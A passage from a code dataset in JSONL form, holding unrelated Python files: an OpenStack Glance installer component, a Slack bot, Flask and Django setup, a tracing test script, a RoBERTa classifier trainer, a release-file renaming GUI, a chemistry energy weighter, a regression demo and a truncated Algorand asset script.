params['endpoints']['internal']['protocol'])\n\n config.set('filter:authtoken', 'admin_tenant_name', params['service_tenant'])\n config.set('filter:authtoken', 'admin_user', params['service_user'])\n config.set('filter:authtoken', 'admin_password', params['service_password'])\n contents = config.stringify(fn)\n return contents\n\n def _config_adjust_api(self, contents, fn):\n params = ghelper.get_shared_params(self.cfg)\n with io.BytesIO(contents) as stream:\n config = cfg.RewritableConfigParser()\n config.readfp(stream)\n img_store_dir = sh.joinpths(self.get_option('component_dir'), 'images')\n config.set('DEFAULT', 'debug', True)\n config.set('DEFAULT', 'verbose', True)\n config.set('DEFAULT', 'default_store', 'file')\n config.set('DEFAULT', 'filesystem_store_datadir', img_store_dir)\n config.set('DEFAULT', 'bind_port', params['endpoints']['public']['port'])\n config.set('DEFAULT', 'sql_connection',\n dbhelper.fetch_dbdsn(self.cfg, DB_NAME, utf8=True))\n config.remove_option('DEFAULT', 'log_file')\n config.set('paste_deploy', 'flavor', 'keystone')\n LOG.info(\"Ensuring file system store directory %r exists and is empty.\" % (img_store_dir))\n sh.deldir(img_store_dir)\n self.tracewriter.dirs_made(*sh.mkdirslist(img_store_dir))\n return config.stringify(fn)\n\n def _config_adjust_logging(self, contents, fn):\n with io.BytesIO(contents) as stream:\n config = cfg.RewritableConfigParser()\n config.readfp(stream)\n config.set('logger_root', 'level', 'DEBUG')\n config.set('logger_root', 'handlers', \"devel,production\")\n contents = config.stringify(fn)\n return contents\n\n def _config_param_replace(self, config_fn, contents, parameters):\n if config_fn in [REG_CONF, REG_PASTE_CONF, API_CONF, API_PASTE_CONF, LOGGING_CONF]:\n # We handle these ourselves\n return contents\n else:\n return comp.PythonInstallComponent._config_param_replace(self, config_fn, contents, parameters)\n\n def _config_adjust(self, contents, name):\n if name == REG_CONF:\n return self._config_adjust_registry(contents, name)\n elif name == REG_PASTE_CONF:\n return self._config_adjust_paste(contents, name)\n elif name == API_CONF:\n return 
self._config_adjust_api(contents, name)\n elif name == API_PASTE_CONF:\n return self._config_adjust_paste(contents, name)\n elif name == LOGGING_CONF:\n return self._config_adjust_logging(contents, name)\n else:\n return contents\n\n\nclass GlanceRuntime(GlanceMixin, comp.PythonRuntime):\n def __init__(self, *args, **kargs):\n comp.PythonRuntime.__init__(self, *args, **kargs)\n self.bin_dir = sh.joinpths(self.get_option('app_dir'), BIN_DIR)\n self.wait_time = max(self.cfg.getint('DEFAULT', 'service_wait_seconds'), 1)\n self.do_upload = self.get_option('load-images')\n\n def _get_apps_to_start(self):\n apps = list()\n for name, values in self.subsystems.items():\n if name in SUB_TO_APP:\n subsys = name\n apps.append({\n 'name': SUB_TO_APP[subsys],\n 'path': sh.joinpths(self.bin_dir, SUB_TO_APP[subsys]),\n # This seems needed, to allow for the db syncs to not conflict... (arg)\n 'sleep_time': 5,\n })\n return apps\n\n def _get_app_options(self, app):\n return APP_OPTIONS.get(app)\n\n def _get_image_urls(self):\n uris = self.cfg.getdefaulted('glance', 'image_urls', '').split(\",\")\n return [u.strip() for u in uris if len(u.strip())]\n\n def post_start(self):\n comp.PythonRuntime.post_start(self)\n if self.do_upload:\n # Install any images that need activating...\n LOG.info(\"Waiting %s seconds so that glance can start up before image install.\" % (self.wait_time))\n sh.sleep(self.wait_time)\n params = {}\n params['glance'] = ghelper.get_shared_params(self.cfg)\n params['keystone'] = khelper.get_shared_params(self.cfg, 'glance')\n ghelper.UploadService(params).install(self._get_image_urls())\n","sub_path":"anvil/components/glance.py","file_name":"glance.py","file_ext":"py","file_size_in_byte":9853,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"}
+{"seq_id":"478095515","text":"# -*- coding: utf-8 -*-\n\nimport time\nimport logging\n\nfrom slackclient import SlackClient\n\nfrom nemesis.bot import bot_messages\nfrom nemesis.common.config import options\nfrom nemesis.models.models import UserSlack\nfrom nemesis.models.models import UserStatusReport\n\n\nclass SlackClientNemesis(object):\n\n def get_bot_info(self):\n bot_info = self.slack_client.api_call(\"auth.test\")\n if 'ok' in bot_info and bot_info['ok'] is True:\n return bot_info['user_id']\n return None\n\n def get_channel_info(self, channel):\n return self.slack_client.api_call(\"channels.info\", channel=channel)\n\n def post_message(self, channel, text):\n self.slack_client.api_call(\"chat.postMessage\", channel=channel, text=text, as_user=True)\n\n def get_user_info(self, user):\n user = self.slack_client.api_call(\"users.info\", user=user)['user']\n return {\n 'slack_id': user['id'],\n 'username': user['name'],\n 'avatar': user['profile']['image_192'],\n 'realname': user['real_name']\n }\n\n\nclass Nemesis(SlackClientNemesis):\n\n def __init__(self):\n self.token = options.slack_token_bot_slack\n self.slack_client = SlackClient(self.token)\n self.bot_id = self.get_bot_info()\n\n def read(self):\n self.slack_connect()\n\n def slack_connect(self):\n if self.slack_client.rtm_connect():\n print('Connected to Nemesis bot')\n logging.info('Connected to Nemesis bot')\n while True:\n try:\n for event in self.slack_client.rtm_read():\n logging.debug(event)\n event_type = self.get_event_type(event)\n if event_type == 'user_login' and UserSlack.has_user_reported(event['user']) is False:\n self.post_message(event['user'], bot_messages.login_message)\n elif event_type == 'user_post_message':\n status, comments = UserStatusReport.get_status(event['text'])\n if status is not None:\n self.user_report_status(event['user'], status, comments)\n else:\n self.post_message(event['user'], text=bot_messages.help_message)\n time.sleep(0.5)\n except KeyboardInterrupt:\n logging.info('Disconnected. Bye bye Nemesis')\n break\n except Exception:\n logging.exception(\"message\")\n else:\n logging.error('Cannot connect to Nemesis bot. Is the token correct?')\n\n def get_event_type(self, event):\n if event['type'] == 'message':\n channel = self.get_channel_info(event['channel'])\n if channel['ok'] is False and event['user'] != self.bot_id:\n return 'user_post_message'\n if event['type'] == 'presence_change' and event['presence'] == 'active':\n return 'user_login'\n\n def user_report_status(self, user, status, comments=None):\n UserSlack.report_status(self.get_user_info(user), status, comments)\n self.post_message(user, text=bot_messages.success_message)\n","sub_path":"src/nemesis/bot/bot.py","file_name":"bot.py","file_ext":"py","file_size_in_byte":3267,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"}
+{"seq_id":"337817995","text":"# pylint: skip-file\nfrom flask import Flask\nfrom flask_mongoengine import MongoEngine\n\ndb = MongoEngine()\n\nfrom app.controllers import main\n\n\ndef create_app(object_name):\n \"\"\"\n An flask application factory, as explained here:\n http://flask.pocoo.org/docs/patterns/appfactories/\n\n Arguments:\n object_name: the python path of the config object,\n e.g. appname.settings.ProdConfig\n \"\"\"\n app = Flask(__name__)\n app.config.from_object(object_name)\n\n # Initialize the database\n db.init_app(app)\n\n # register our blueprints\n app.register_blueprint(main)\n\n return app\n","sub_path":"app/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":622,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"}
+{"seq_id":"516309873","text":"#!/usr/bin/python\n\"\"\"\nNewTraceFac_test.py\nspecifically for v18py6.\n\"\"\"\n\nfrom NewTrace18py6 import NTRC, ntrace, ntracef\nfrom os import environ\n\n\n# Crack open the black box to replace the params\n# for testing.\ndef setNewDefaults(obj, mylevel=6, mytarget=0, myfile=\"\", myfacility=\"\", \n mytime=\"\", myhtml=\"\", myproduction=0):\n obj.setDefaults(level=mylevel, target=mytarget, file=myfile, \n facility=myfacility, time=mytime, html=myhtml, \n production=myproduction)\n print(\"\\nsetNewDef: level=|%d| target=|%d| file=|%s| facility=|%s| time=|%s| \"\n \"html=|%s| production|%s|\" \n % (mylevel, mytarget, myfile, myfacility, mytime, \n myhtml, myproduction))\n\n\n# A L L L E V E L S \ndef testAllLevels():\n print(\"\\n========== testAllLevels ============\\n\")\n NTRC.ntrace(0,\"test level 0\")\n NTRC.ntrace(1,\"test level 1\")\n NTRC.ntrace(2,\"test level 2\")\n NTRC.ntrace(3,\"test level 3\")\n NTRC.ntrace(4,\"test level 4\")\n NTRC.ntrace(5,\"test level 5\")\n\n\ndef testFacils():\n print(\"========== testFacils ============\")\n NTRC.ntrace(0,\"test level 0\")\n NTRC.ntrace(1,\"test level 1\")\n NTRC.ntracef(1,\"AAA\",\"facil AAA at test level 1\")\n NTRC.ntracef(1,\"BBB\",\"facil AAA at test level 1\")\n\n\ndef testOneLevel():\n print(\"============ testOneLevel =============\")\n NTRC.ntracef(0,\"A\",\"facil A at test level 0\")\n NTRC.ntracef(0,\"B\",\"facil B at test level 0\")\n NTRC.ntracef(0,\"C\",\"facil C at test level 0\")\n\n\n# M A J O R T E S T S \n\n# V A R I O U S L E V E L S \ndef testVariousLevels():\n print(\"\\n============ testVariousLevels =============\\n\")\n setNewDefaults(NTRC, mylevel=0, mytarget=0, myfile=\"\", \n myfacility=\"\", mytime=\"\", myhtml=\"\", myproduction=0)\n testAllLevels()\n \n setNewDefaults(NTRC, mylevel=1, mytarget=0, myfile=\"\", \n myfacility=\"\", mytime=\"\", myhtml=\"\", myproduction=0)\n testAllLevels()\n \n setNewDefaults(NTRC, mylevel=5, mytarget=0, myfile=\"\", \n myfacility=\"\", mytime=\"\", myhtml=\"\", myproduction=0)\n testAllLevels()\n\n\n# A L L F A C I L I T I E S \ndef testAllFacils():\n print(\"\\n============ testAllFacils =============\\n\")\n setNewDefaults(NTRC, mylevel=5, mytarget=0, myfile=\"\", \n myfacility=\"\", mytime=\"\", myhtml=\"\", myproduction=0)\n testFacils()\n\n lFacils = (\"'' ALL ALL-A ALL-AAA \"\n \"NONE NONE+A NONE+AAA GIGO \" \n \"all-aaa none+aaa\").split()\n for sFacil in lFacils:\n setNewDefaults(NTRC, mylevel=5, mytarget=0, myfile=\"\", \n myfacility=sFacil, mytime=\"\", myhtml=\"\", myproduction=0)\n testFacils()\n\n\n# A L L T A R G E T S \ndef testAllTargets():\n print(\"\\n============ testAllTargets =============\\n\")\n lTargets = [0,1,2,3,4,5,6,7]\n for iTarget in lTargets:\n setNewDefaults(NTRC, mylevel=5, mytarget=iTarget, \n myfile=\"test_NewTrace.log\", \n myfacility=\"\", mytime=\"\", myhtml=\"\", myproduction=0)\n testFacils()\n\n setNewDefaults(NTRC, mylevel=5, mytarget=0, \n myfile=\"test_NewTrace_shouldnotbehere.log\", \n myfacility=\"\", mytime=\"\", myhtml=\"\", myproduction=0)\n testOneLevel()\n\n\n# A L L H T M L S \ndef testAllHTMLs():\n print(\"\\n============ testAllHTMLs =============\\n\")\n lHtmlStrings = [\"\", 0, \"00\", \"|\", \"|\", \"\", \"|\", \"|\"]\n for sHtml in lHtmlStrings:\n setNewDefaults(NTRC, mylevel=5, mytarget=2, myfile=\"\", \n myfacility=\"\", mytime=\"\", myhtml=sHtml, myproduction=0)\n testFacils()\n \n\n# A L L T I M E S \ndef testAllTimes():\n print(\"\\n============ testAllTimes 
=============\\n\")\n lTimes = [0, \"\", \"00\", \"YES\", \"NO\"]\n for sTime in lTimes:\n setNewDefaults(NTRC, mylevel=5, mytarget=0, myfile=\"\", \n myfacility=\"\", mytime=sTime, myhtml=\"\", myproduction=0)\n testFacils()\n\n\n# D E C O R A T O R L E V E L S \ndef testAllDecoratorLevels():\n print(\"\\n========== testAllDecoratorLevels ============\\n\")\n @ntrace\n def testDecoPlain():\n return \"MePlain\"\n @ntracef(\"FANC\", level=4)\n def testDecoFancy1():\n return \"MeFancy1 elevated level\"\n @ntracef(\"\", level=4)\n def testDecoFancy2():\n return \"MeFancy2 elevated level no facility\"\n\n setNewDefaults(NTRC, mylevel=5, mytarget=0, myfile=\"\", \n myfacility=\"\", mytime=\"\", myhtml=\"\", myproduction=0)\n testDecoPlain()\n testDecoFancy1()\n testDecoFancy2()\n\n\n# E N T R Y P O I N T \nif 1:\n print (\"============= Begin =============\")\n setNewDefaults(NTRC, mylevel=0, mytarget=0, myfile=\"\", \n myfacility=\"\", mytime=\"YES\", myhtml=\"\", myproduction=0)\n NTRC.ntrace(0, \"BEGIN\")\n\n setNewDefaults(NTRC, mylevel=6, mytarget=0, myfile=\"\", \n myfacility=\"all-aaa\", mytime=\"\", myhtml=\"\", myproduction=0)\n testAllLevels()\n \n testVariousLevels()\n\n testAllFacils()\n\n testAllDecoratorLevels()\n\n testAllTargets()\n\n testAllHTMLs()\n \n testAllTimes()\n\n setNewDefaults(NTRC, mylevel=0, mytarget=0, myfile=\"\", \n myfacility=\"\", mytime=\"YES\", myhtml=\"\", myproduction=0)\n NTRC.ntrace(0, \"DONE!\")\n\n\n'''\nWhat I actually should be testing:\n\n- ntrace levels 0, 1, 5\n- target 0,1,2,4,5,6,7\n- file none, name.ext w target=4, name.ext w target=0\n- facil \"\",all,all-a,all-aaa,none,none+a,none+aaa,gigo\n- html \"\",|,|,,|,|\n- time 0,\"\",\"0\",\"YES\",\"NO\"\n- production \"\",YES,NO\n\n'''\n\n#END\n","sub_path":"test/NewTraceFac18py6_test.py","file_name":"NewTraceFac18py6_test.py","file_ext":"py","file_size_in_byte":5462,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"}
+{"seq_id":"62349576","text":"from django.conf.urls import patterns, url, include\nfrom django.contrib import admin\nfrom django.contrib.auth.views import logout\nfrom django.views.generic import TemplateView\n\nadmin.autodiscover()\n\nurlpatterns = patterns('',\n url(r'^$', TemplateView.as_view(\n template_name=\"places/index.html\"), name='home'),\n url(r'^detail.html$', TemplateView.as_view(\n template_name=\"detail.html\"), name='home'),\n url(r'logout$', logout, {'next_page': \"/\"}, name='logout'),\n url(r'^places/', include('campgrounds.places.urls')),\n url(r'^wall/', include('campgrounds.wall.urls')),\n url(r'^admin/', include(admin.site.urls)),\n url(r'', include('social_auth.urls')),\n)\n","sub_path":"build/campgrounds/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":690,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"}
+{"seq_id":"417348890","text":"import logging\nimport pickle\nfrom pathlib import Path\n\nimport pandas as pd\nfrom sklearn.model_selection import train_test_split\nfrom simpletransformers.classification import ClassificationModel, ClassificationArgs\n\n\ndef get_args():\n model_args = ClassificationArgs()\n model_args.labels_list = ['anger', 'anticipation', 'disgust', 'fear', 'joy', 'sadness', 'surprise', 'trust']\n model_args.cache_dir = 'cache/'\n model_args.output_dir = 'outputs'\n model_args.overwrite_output_dir = True\n model_args.n_gpu = 2\n model_args.learning_rate = 1e-5\n model_args.num_train_epochs = 10\n model_args.train_batch_size = 128\n model_args.eval_batch_size = 128\n\n return model_args\n\n\nif __name__ == '__main__':\n logging.basicConfig(level=logging.INFO)\n transformers_logger = logging.getLogger(\"transformers\")\n transformers_logger.setLevel(logging.ERROR)\n\n dataset_dir = 'dm2020-hw2-nthu'\n dataset_path = Path(dataset_dir)\n train_df = pickle.load(open(dataset_path/'train.pkl', 'rb'))\n test_df = pickle.load(open(dataset_path/'test.pkl', 'rb'))\n\n x_train, x_val, y_train, y_val = train_test_split(\n train_df['text'].values, train_df['emotion'].values, test_size=0.2, shuffle=True, random_state=55688)\n\n train_data = pd.DataFrame({'id': x_train, 'label': y_train})\n val_data = pd.DataFrame({'id': x_val, 'label': y_val})\n\n model = ClassificationModel('roberta', 'roberta-base', args=get_args(), num_labels=8)\n\n # Train the model\n model.train_model(train_data)\n\n # Evaluate the model\n result, model_outputs, wrong_predictions = model.eval_model(val_data)\n\n predictions, _ = model.predict(test_df['text'].values)\n\n submission_df = pd.DataFrame({'id': test_df['tweet_id'].values, 'emotion': predictions})\n submission_df.to_csv('submission.csv', index=False)\n","sub_path":"bert_simple.py","file_name":"bert_simple.py","file_ext":"py","file_size_in_byte":1828,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"}
+{"seq_id":"225310437","text":"__author__ = 'adamidesa', 'websterj2'\r\n\r\nimport os\r\nfrom datetime import datetime, timedelta\r\nfrom Tkinter import *\r\n\r\n# GUI\r\nclass App:\r\n def __init__(self, master):\r\n\r\n frame = Frame(master)\r\n frame.grid()\r\n\r\n # create path label\r\n self.label2 = Label(\r\n frame, text=\"Enter release folder path: \"\r\n )\r\n self.label2.grid(row=0, column=0, columnspan=4, pady=2)\r\n\r\n # create text entry widget\r\n self.entry2 = Entry(\r\n frame, width=40\r\n )\r\n self.entry2.focus\r\n self.entry2.grid(row=1, column=0, columnspan=4, pady=2)\r\n\r\n # create label\r\n self.label = Label(\r\n frame, text=\"No. of scripts to create: \"\r\n )\r\n self.label.grid(row=3, column=1, columnspan=1, pady=4)\r\n\r\n # create text entry widget\r\n self.entry = Entry(\r\n frame, width=3\r\n )\r\n self.entry.focus\r\n self.entry.grid(row=3, column=2, columnspan=1)\r\n\r\n # create generate button\r\n self.genbutton = Button(\r\n frame, text=\"Generate Structure\", fg=\"black\", height=1, width=34, command=self.on_sgen\r\n )\r\n self.genbutton.grid(row=4, column=0, columnspan=4)\r\n\r\n # create prepare button\r\n self.prepbutton = Button(\r\n frame, text=\"Prepare Timestamps\", fg=\"black\", height=1, width=34, command=self.on_prep\r\n )\r\n self.prepbutton.grid(row=2, column=0, columnspan=4)\r\n\r\n # create add v's button\r\n self.addbutton = Button(\r\n frame, text=\"Add Vs\", fg=\"black\", height=1, width=34, command=self.on_addv\r\n )\r\n self.addbutton.grid(row=5, column=0, columnspan=4)\r\n\r\n # create rem v's button\r\n self.rembutton = Button(\r\n frame, text=\"Remove Vs\", fg=\"black\", height=1, width=34, command=self.on_remv\r\n )\r\n self.rembutton.grid(row=6, column=0, columnspan=4)\r\n\r\n def on_sgen(self):\r\n global text\r\n text = self.entry.get()\r\n\r\n # cast input text to int\r\n try:\r\n text = int(text)\r\n except ValueError:\r\n text = 0\r\n\r\n # generate release structure\r\n self.generate()\r\n\r\n def on_addv(self):\r\n\r\n os.chdir(\"Releases\")\r\n for f in os.listdir(os.getcwd()):\r\n # acquire file name\r\n filename = f\r\n p = re.compile('\\d*_{2}.*')\r\n\r\n # if match then rename\r\n if p.match(filename) is not None:\r\n # concact V prefix\r\n newname = \"V\" + filename\r\n # rename file\r\n os.rename(f, newname)\r\n\r\n os.chdir(\"..\")\r\n\r\n def on_remv(self):\r\n\r\n os.chdir(\"Releases\")\r\n for f in os.listdir(os.getcwd()):\r\n # acquire file name\r\n filename = f\r\n\r\n # set regex\r\n p = re.compile('V{1}\\d+.*')\r\n\r\n if p.match(filename) is not None:\r\n # remove first character of filename - needs further validation\r\n newname = f[1:]\r\n # rename file\r\n os.rename(f, newname)\r\n\r\n os.chdir(\"..\")\r\n\r\n def on_prep(self):\r\n\r\n #global rpath\r\n rpath = self.entry2.get()\r\n\r\n releasesfolder = \"Releases\"\r\n rollbackfolder = \"Rollback\"\r\n\r\n now = datetime.now()\r\n year = now.year\r\n month = now.month\r\n day = now.day\r\n hour = now.hour\r\n minute = now.minute\r\n\r\n timestamp = now\r\n\r\n # rpath debug\r\n #print \"Release path is: \", rpath\r\n\r\n # Change to Releases directory\r\n os.chdir(rpath)\r\n\r\n # debug rpath chdir\r\n #print \"Entered release path: \", os.getcwd()\r\n\r\n os.chdir(releasesfolder)\r\n listdir = os.listdir(os.getcwd())\r\n\r\n # File dir loop\r\n for f in listdir:\r\n\r\n #print \"File: \" + f\r\n # Extract remaining filename\r\n if re.search('_{2}.*', f) is not None:\r\n # print \"Double underscore detected, firing first loop\"\r\n\r\n # print 
re.search('_{2}.*', f)\r\n ext_fn = re.search('_{2}.*', f).group(0)\r\n # Add minute increment to timestamp\r\n timestamp += timedelta(minutes=1)\r\n # print \"Timestamp: \", timestamp\r\n # Create new timestamp string\r\n timestring = str('{:%Y%m%d%H%M}'.format(timestamp))\r\n # print timestring\r\n # Rename file\r\n os.rename(f, \"V\" + timestring + ext_fn)\r\n\r\n else:\r\n\r\n prefix = re.search('\\d+_', f).group(0)\r\n # print \"Prefix: \", prefix\r\n\r\n prefix_len = len(prefix)\r\n # print \"Prefix len: \", prefix_len\r\n\r\n filename = f\r\n # Add minute increment to timestamp\r\n timestamp += timedelta(minutes=1)\r\n # print \"Timestamp: \", timestamp\r\n # Create new timestamp string\r\n timestring = str('{:%Y%m%d%H%M}'.format(timestamp))\r\n # print timestring\r\n # Rename file\r\n os.rename(f, \"V\" + timestring + \"__\" + filename[prefix_len:])\r\n\r\n os.chdir(\"..\")\r\n\r\n # Change to Rollback directory\r\n os.chdir(rollbackfolder)\r\n listdir = os.listdir(os.getcwd())\r\n\r\n for f in listdir:\r\n\r\n # print \"File: \" + f\r\n # Extract remaining filename\r\n if re.search('_{2}.*', f) is not None:\r\n # print \"Run code\"\r\n\r\n # print re.search('_{2}.*', f)\r\n ext_fn = re.search('_{2}.*', f).group(0)\r\n # Add minute increment to timestamp\r\n timestamp += timedelta(minutes=1)\r\n # print \"Timestamp: \", timestamp\r\n # Create new timestamp string\r\n timestring = str('{:%Y%m%d%H%M}'.format(timestamp))\r\n # print timestring\r\n # Rename file\r\n os.rename(f, timestring + ext_fn)\r\n\r\n else:\r\n\r\n prefix = re.search('\\d+_', f).group(0)\r\n # print \"Prefix: \", prefix\r\n\r\n prefix_len = len(prefix)\r\n # print \"Prefix len: \", prefix_len\r\n\r\n filename = f\r\n # Add minute increment to timestamp\r\n timestamp += timedelta(minutes=1)\r\n # print \"Timestamp: \", timestamp\r\n # Create new timestamp string\r\n timestring = str('{:%Y%m%d%H%M}'.format(timestamp))\r\n # print timestring\r\n # Rename file\r\n os.rename(f, timestring + \"__\" + filename[prefix_len:])\r\n\r\n os.chdir(\"..\")\r\n\r\n def generate(self):\r\n\r\n rpath = self.entry2.get()\r\n\r\n now = datetime.now()\r\n\r\n timestamp = now\r\n\r\n # Change to Releases directory\r\n os.chdir(rpath)\r\n\r\n releasesfolder = \"Releases\"\r\n docsfolder = \"Docs\"\r\n rollbackfolder = \"Rollback\"\r\n\r\n # Parse release name\r\n releasename = re.search('(CHG.*.)', (os.getcwd())).group(0)\r\n\r\n\r\n # Construct basefilename\r\n basefilename = \"\"\r\n i = 0\r\n for entry in releasename.split(\"_\"):\r\n if (i == 0) or (i == 2) or (i == 3):\r\n i += 1\r\n else:\r\n basefilename = basefilename.__add__(entry + \"_\")\r\n i += 1\r\n\r\n # Create dirs\r\n os.makedirs(releasesfolder)\r\n os.makedirs(docsfolder)\r\n os.makedirs(rollbackfolder)\r\n\r\n # Generate n release files\r\n for i in range(1, text + 1):\r\n\r\n # Add minute increment to timestamp\r\n timestamp += timedelta(minutes=1)\r\n # print \"Timestamp: \", timestamp\r\n\r\n # Create new timestamp string\r\n timestring = str('{:%Y%m%d%H%M}'.format(timestamp))\r\n\r\n release1 = \"V\" + timestring + \"__\" + basefilename + \"_action_schema_table_tbl\" + \".sql\"\r\n file(releasesfolder + \"/\" + release1, \"w\")\r\n\r\n # Generate rollback file\r\n timestamp += timedelta(minutes=1)\r\n timestring = str('{:%Y%m%d%H%M}'.format(timestamp))\r\n rollbackfile = timestring + \"__\" + basefilename + \"Rollback\" + \".sql\"\r\n file(rollbackfolder + \"/\" + rollbackfile, \"w\")\r\n\r\n# Create tk frame\r\nroot = Tk()\r\n\r\n# Frame 
options\r\nroot.wm_title(\"\")\r\nroot.resizable(width=FALSE, height=FALSE)\r\n# root.geometry(\"300x300\")\r\n\r\napp = App(root)\r\nroot.mainloop()\r\n\r\n# root.destroy()\r\n","sub_path":"aliens/PythonProjects/RedshiftDeployment/release_prep_util.pyw","file_name":"release_prep_util.pyw","file_ext":"pyw","file_size_in_byte":8567,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"}
+{"seq_id":"445717008","text":"import sys\r\nimport os\r\nimport numpy as np\r\nimport math\r\n\r\ndirectory = r'G:\\Hopkins_Laboratory\\Pesticide_AcE_Inhibitor\\Structures\\Protonated\\DFT_and_MobCal\\8\\Outputs'\r\n\r\n#constants\r\nR = 8.3144598E-3 # kJ mol^-1\r\nT = 298.15 #kelvin\r\n\r\n#csv containing filenames and HF energies (unscaled)\r\nopf = open(directory+'\\\\Gibbs.csv', 'r')\r\ndata = opf.readlines()\r\nopf.close()\r\n\r\n#do not edit past this point\r\n#curent name\r\ncn = ''\r\nmn = [] #master name array\r\nme = [] #master energy array\r\ntn = [] #temp name array\r\nte = [] #temp energy array\r\n\r\nfor line in data[1:]:\r\n line = line.split(',')\r\n name = line[0]\r\n energy = float(line[1].strip())\r\n prefix = name[:name.rfind('_')]\r\n if prefix != cn: #group isomers by chemical name found in input filename\r\n mn.append(tn)\r\n me.append(te)\r\n tn = []\r\n te = []\r\n cn = prefix\r\n tn.append(name)\r\n te.append(energy)\r\n\r\n#remove blank initial value in mn and me arrays\r\nmn = mn[1:]\r\nme = me[1:]\r\n\r\nme2 = []\r\nweight = []\r\n\r\nfor nrg in me:\r\n #get min energy\r\n min_e = min(nrg)\r\n rel_e = (np.array(nrg)-min_e)*2625.5\r\n #boltzmann weighting\r\n b = np.exp((-rel_e)/(R*T))\r\n pop = sum(b)\r\n w = b/pop\r\n me2.append(rel_e.tolist())\r\n weight.append(w.tolist())\r\n\r\n#write filename, energy, relative energy, and botlzmann weight to file\r\nopf = open(directory+'\\\\Rel_E.csv', 'w')\r\nopf.write('Name,Energy,Relative E,Boltzmann Weight\\n')\r\nfor i in range(len(mn)):\r\n for a in range(len(mn[i])):\r\n opf.write(mn[i][a]+','+str(me[i][a])+','+str(me2[i][a])+','+str(weight[i][a])+'\\n')\r\n\r\nopf.close()\r\n","sub_path":"Energy_Weighter/Energy_weighter.py","file_name":"Energy_weighter.py","file_ext":"py","file_size_in_byte":1601,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"}
+{"seq_id":"280559588","text":"import numpy as np \r\nimport pandas as pd\r\nimport matplotlib.pyplot as plt \r\nfrom sklearn.linear_model import LinearRegression\r\n\r\ndataset = pd.read_csv(\"Position_Salaries.csv\")\r\nfeatures=dataset.iloc[:,1:-1].values\r\nlabels=dataset.iloc[:,-1].values\r\n\r\nplt.scatter(features, labels)\r\nplt.show()\r\n\r\nfrom sklearn.preprocessing import PolynomialFeatures\r\npoly_object =PolynomialFeatures(degree = 6)\r\nfeatures_poly = poly_object.fit_transform(features)\r\n\r\nlin_reg = LinearRegression()\r\nlin_reg.fit(features_poly,labels)\r\n\r\nlin_reg.predict(poly_object.transform([[6]]))\r\n\r\n#Visaulize the polynomial set \r\n#features_grid=np.arange(min(features),max(features),0.01)\r\n#features_grid=features_grid.reshape(len(features_grid),1)\r\nplt.scatter(features,labels,color='red')\r\nplt.plot(features,lin_reg.predict(poly_object.fit_transform(features)),color='blue')\r\nplt.title('PLR')\r\nplt.xlabel('Year')\r\nplt.ylabel(\"Cost\")\r\nplt.show()\r\n\r\np=lin_reg.predict(poly_object.transform([[7.8]]))\r\n","sub_path":"Position_Salaries.py","file_name":"Position_Salaries.py","file_ext":"py","file_size_in_byte":969,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"}
+{"seq_id":"370865355","text":"########## IMPORT PACKAGES ##########\nimport json\nfrom algosdk.v2client import algod\nfrom algosdk import account, mnemonic\nfrom algosdk.future.transaction import AssetConfigTxn, AssetTransferTxn, AssetFreezeTxn\n\n########## HELPER FUNCTIONS ##########\ndef wait_for_confirmation(client, txid):\n \"\"\"\n Utility function to wait until the transaction is\n confirmed before proceeding.\n \"\"\"\n last_round = client.status().get('last-round')\n txinfo = client.pending_transaction_info(txid)\n while not (txinfo.get('confirmed-round') and txinfo.get('confirmed-round') > 0):\n print(\"Waiting for confirmation\")\n last_round += 1\n client.status_after_block(last_round)\n txinfo = client.pending_transaction_info(txid)\n print(\"Transaction {} confirmed in round {}.\".format(txid, txinfo.get('confirmed-round')))\n return txinfo\n\n# Utility function used to print created asset for account and assetid\ndef print_created_asset(algodclient, account, assetid): \n # note: if you have an indexer instance available it is easier to just use this\n # response = myindexer.accounts(asset_id = assetid)\n # then use 'account_info['created-assets'][0] to get info on the created asset\n account_info = algodclient.account_info(account)\n idx = 0;\n for my_account_info in account_info['created-assets']:\n scrutinized_asset = account_info['created-assets'][idx]\n idx = idx + 1 \n if (scrutinized_asset['index'] == assetid):\n print(\"Asset ID: {}\".format(scrutinized_asset['index']))\n print(json.dumps(my_account_info['Sparams'], indent=4))\n break\n return\n\n# Utility function used to print asset holding for account and assetid\ndef print_asset_holding(algodclient, account, assetid):\n # note: if you have an indexer instance available it is easier to just use this\n # response = myindexer.accounts(asset_id = assetid)\n # then loop thru the accounts returned and match the account you are looking for\n account_info = algodclient.account_info(account)\n idx = 0\n for my_account_info in account_info['assets']:\n scrutinized_asset = account_info['assets'][idx]\n idx = idx + 1 \n if (scrutinized_asset['asset-id'] == assetid):\n print(\"Asset ID: {}\".format(scrutinized_asset['asset-id']))\n print(json.dumps(scrutinized_asset, indent=4))\n break\n return\n\n\n########## SWITCHES ##########\n\n# TODO: change keys into JSON requests\ndef txn_switch(txn_type): # param should be string\n txn = none\n if txn_type == 'create':\n txn = createDocument()\n elif txn_type == 'verify':\n txn = verifyDocument()\n elif txn_type == 'revoke':\n txn = revokeDocument()\n return txn\n\ndef printInformation(txn_type):\n try:\n # Pull account info for the creator\n # account_info = algod_client.account_info(accounts[1]['pk'])\n # get asset_id from tx\n # Get the new asset's information from the creator account\n ptx = algod_client.pending_transaction_info(txid)\n asset_id = ptx[\"asset-index\"]\n if txn_type == 'create':\n print_created_asset(algod_client, accounts[1]['pk'], asset_id)\n print_asset_holding(algod_client, accounts[1]['pk'], asset_id)\n elif txn_type == 'verify':\n print(\"print what?\")\n except Exception as e:\n print(e)\n return\n\n\n########## SUBROUTINES ##########\n\ndef createDocument(pk, html_file, doc_id, doc_name):\n wrapDocument(html_file)\n txn = AssetConfigTxn(\n sender = pk,\n sp = params,\n total = 1,\n default_frozen = False,\n unit_name = doc_id,\n asset_name = doc_name,\n manager = pk,\n reserve = pk,\n freeze = pk,\n clawback = 